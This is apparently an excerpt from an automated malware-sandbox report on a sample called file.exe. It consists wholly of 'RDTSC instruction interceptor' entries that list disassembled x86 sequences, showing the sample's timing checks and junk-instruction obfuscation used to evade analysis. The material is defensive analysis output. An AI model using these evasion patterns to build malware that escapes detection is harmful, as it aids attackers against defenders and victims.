              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 311333 second address: 31133B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31133B second address: 311341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3167EB second address: 316804 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F80AC503246h 0x00000009 pop ecx 0x0000000a jno 00007F80AC503248h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316804 second address: 31680A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31680A second address: 316810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316810 second address: 316815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DEF94 second address: 2DEF9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F80AC503246h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 315DBC second address: 315DD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F80ACC66776h 0x00000009 ja 00007F80ACC66776h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 ja 00007F80ACC66776h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 315DD6 second address: 315DDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 315F2D second address: 315F45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F80ACC6677Ah 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 315F45 second address: 315F62 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F80AC503257h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 315F62 second address: 315F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3160A5 second address: 3160A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3160A9 second address: 3160AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3160AD second address: 3160CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F80AC503255h 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3160CE second address: 3160D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316387 second address: 316391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F80AC503246h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316391 second address: 316397 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316397 second address: 3163AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F80AC50324Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3163AD second address: 3163B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3166A3 second address: 3166AF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F80AC503246h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316F80 second address: 316F8A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F80ACC66776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316F8A second address: 316F97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316F97 second address: 316FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop esi 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e js 00007F80ACC66786h 0x00000014 jmp 00007F80ACC66780h 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 push ecx 0x00000023 push eax 0x00000024 pop eax 0x00000025 pop ecx 0x00000026 popad 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b push edi 0x0000002c push ebx 0x0000002d pushad 0x0000002e popad 0x0000002f pop ebx 0x00000030 pop edi 0x00000031 pop eax 0x00000032 mov dword ptr [ebp+122D29CBh], esi 0x00000038 push 7296707Eh 0x0000003d pushad 0x0000003e push edi 0x0000003f pushad 0x00000040 popad 0x00000041 pop edi 0x00000042 push eax 0x00000043 push edx 0x00000044 push edi 0x00000045 pop edi 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 317534 second address: 317538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 317538 second address: 31754C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b ja 00007F80ACC66776h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31761B second address: 317620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 317620 second address: 317627 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3186D3 second address: 318746 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007F80AC503248h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 mov si, 243Ah 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push edx 0x0000002a call 00007F80AC503248h 0x0000002f pop edx 0x00000030 mov dword ptr [esp+04h], edx 0x00000034 add dword ptr [esp+04h], 0000001Ch 0x0000003c inc edx 0x0000003d push edx 0x0000003e ret 0x0000003f pop edx 0x00000040 ret 0x00000041 jg 00007F80AC503249h 0x00000047 push 00000000h 0x00000049 sub dword ptr [ebp+122D2A56h], eax 0x0000004f push eax 0x00000050 pushad 0x00000051 jmp 00007F80AC50324Eh 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 318E14 second address: 318E30 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F80ACC66781h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3197EC second address: 3197F6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F80AC50324Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31B564 second address: 31B5CB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a add esi, 10AA0771h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F80ACC66778h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e or dword ptr [ebp+12461723h], ecx 0x00000034 xchg eax, ebx 0x00000035 push eax 0x00000036 jmp 00007F80ACC6677Eh 0x0000003b pop eax 0x0000003c push eax 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F80ACC66783h 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31B5CB second address: 31B5CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31BFF4 second address: 31BFF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31CACA second address: 31CACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31D559 second address: 31D5D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 je 00007F80ACC6678Dh 0x0000000c jo 00007F80ACC66787h 0x00000012 jmp 00007F80ACC66781h 0x00000017 nop 0x00000018 mov esi, dword ptr [ebp+122D2FFDh] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007F80ACC66778h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000015h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a sub di, 26FEh 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push ebp 0x00000044 call 00007F80ACC66778h 0x00000049 pop ebp 0x0000004a mov dword ptr [esp+04h], ebp 0x0000004e add dword ptr [esp+04h], 0000001Ch 0x00000056 inc ebp 0x00000057 push ebp 0x00000058 ret 0x00000059 pop ebp 0x0000005a ret 0x0000005b mov edi, dword ptr [ebp+122D1D3Dh] 0x00000061 xchg eax, ebx 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 push edx 0x00000066 pop edx 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31D5D9 second address: 31D5DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31D5DD second address: 31D601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F80ACC66787h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31D2BD second address: 31D2D9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F80AC50324Bh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F80AC503246h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31D2D9 second address: 31D2DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3227A3 second address: 3227C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F80AC503252h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F80AC50324Dh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3227C9 second address: 3227CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3227CD second address: 3227D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3227D5 second address: 3227DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3227DC second address: 3227E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3227E2 second address: 3227EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F80ACC6677Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32308D second address: 3230A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F80AC503258h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3252E2 second address: 3252E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3272C1 second address: 3272C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3272C5 second address: 3272F0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F80ACC66787h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32B8D2 second address: 32B8D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32E8A8 second address: 32E8C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F80ACC66781h 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DB9A5 second address: 2DB9B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F80AC50324Ch 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DB9B6 second address: 2DB9E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80ACC6677Bh 0x00000007 pushad 0x00000008 jmp 00007F80ACC66786h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pushad 0x00000018 popad 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pop eax 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32EF0B second address: 32EF17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32BA24 second address: 32BA28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32BA28 second address: 32BA80 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F80AC503254h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f movzx edi, ax 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov edi, ebx 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 push esi 0x00000023 push ebx 0x00000024 mov edi, dword ptr [ebp+12462055h] 0x0000002a pop ebx 0x0000002b pop edi 0x0000002c mov eax, dword ptr [ebp+122D06E1h] 0x00000032 add dword ptr [ebp+122D2EA7h], ecx 0x00000038 push FFFFFFFFh 0x0000003a push eax 0x0000003b mov ebx, dword ptr [ebp+122D3845h] 0x00000041 pop edi 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 pushad 0x00000047 popad 0x00000048 pop eax 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32BA80 second address: 32BA8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F80ACC66776h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32CAA9 second address: 32CAAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32FE2B second address: 32FEB1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F80ACC66778h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007F80ACC66778h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 00000016h 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 mov edi, dword ptr [ebp+122D36A9h] 0x00000046 push 00000000h 0x00000048 push 00000000h 0x0000004a push edi 0x0000004b call 00007F80ACC66778h 0x00000050 pop edi 0x00000051 mov dword ptr [esp+04h], edi 0x00000055 add dword ptr [esp+04h], 00000018h 0x0000005d inc edi 0x0000005e push edi 0x0000005f ret 0x00000060 pop edi 0x00000061 ret 0x00000062 xchg eax, esi 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F80ACC6677Dh 0x0000006a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32FEB1 second address: 32FED1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F80AC503252h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jng 00007F80AC50324Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 330EFF second address: 330F96 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F80ACC6677Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F80ACC66787h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F80ACC66778h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e add dword ptr [ebp+1247E631h], esi 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007F80ACC66778h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 00000014h 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 cmc 0x00000051 xchg eax, esi 0x00000052 jmp 00007F80ACC66787h 0x00000057 push eax 0x00000058 pushad 0x00000059 jbe 00007F80ACC66778h 0x0000005f push eax 0x00000060 push edx 0x00000061 jnc 00007F80ACC66776h 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3300DB second address: 3300E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 331119 second address: 33111E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33111E second address: 331125 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 331125 second address: 3311BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnc 00007F80ACC66787h 0x0000000e nop 0x0000000f sub dword ptr [ebp+1247D174h], edi 0x00000015 jmp 00007F80ACC66789h 0x0000001a push dword ptr fs:[00000000h] 0x00000021 or edi, 352ED7C9h 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e jmp 00007F80ACC6677Ch 0x00000033 mov eax, dword ptr [ebp+122D149Dh] 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c call 00007F80ACC66778h 0x00000041 pop ecx 0x00000042 mov dword ptr [esp+04h], ecx 0x00000046 add dword ptr [esp+04h], 0000001Ah 0x0000004e inc ecx 0x0000004f push ecx 0x00000050 ret 0x00000051 pop ecx 0x00000052 ret 0x00000053 push FFFFFFFFh 0x00000055 nop 0x00000056 push eax 0x00000057 push edx 0x00000058 je 00007F80ACC6677Ch 0x0000005e jns 00007F80ACC66776h 0x00000064 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3311BD second address: 3311CB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 333E0E second address: 333E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 333E12 second address: 333E16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 333E16 second address: 333E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+122D370Dh] 0x00000010 push 00000000h 0x00000012 mov ebx, dword ptr [ebp+122D3685h] 0x00000018 movsx edi, si 0x0000001b push 00000000h 0x0000001d mov bh, ch 0x0000001f xchg eax, esi 0x00000020 jmp 00007F80ACC66781h 0x00000025 push eax 0x00000026 jng 00007F80ACC66784h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 333E52 second address: 333E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33E3A2 second address: 33E3AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jp 00007F80ACC6677Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33E3AF second address: 33E3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33E3B7 second address: 33E3BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33E3BD second address: 33E3D1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F80AC503246h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33E3D1 second address: 33E3D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33DD24 second address: 33DD2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33DD2A second address: 33DD31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
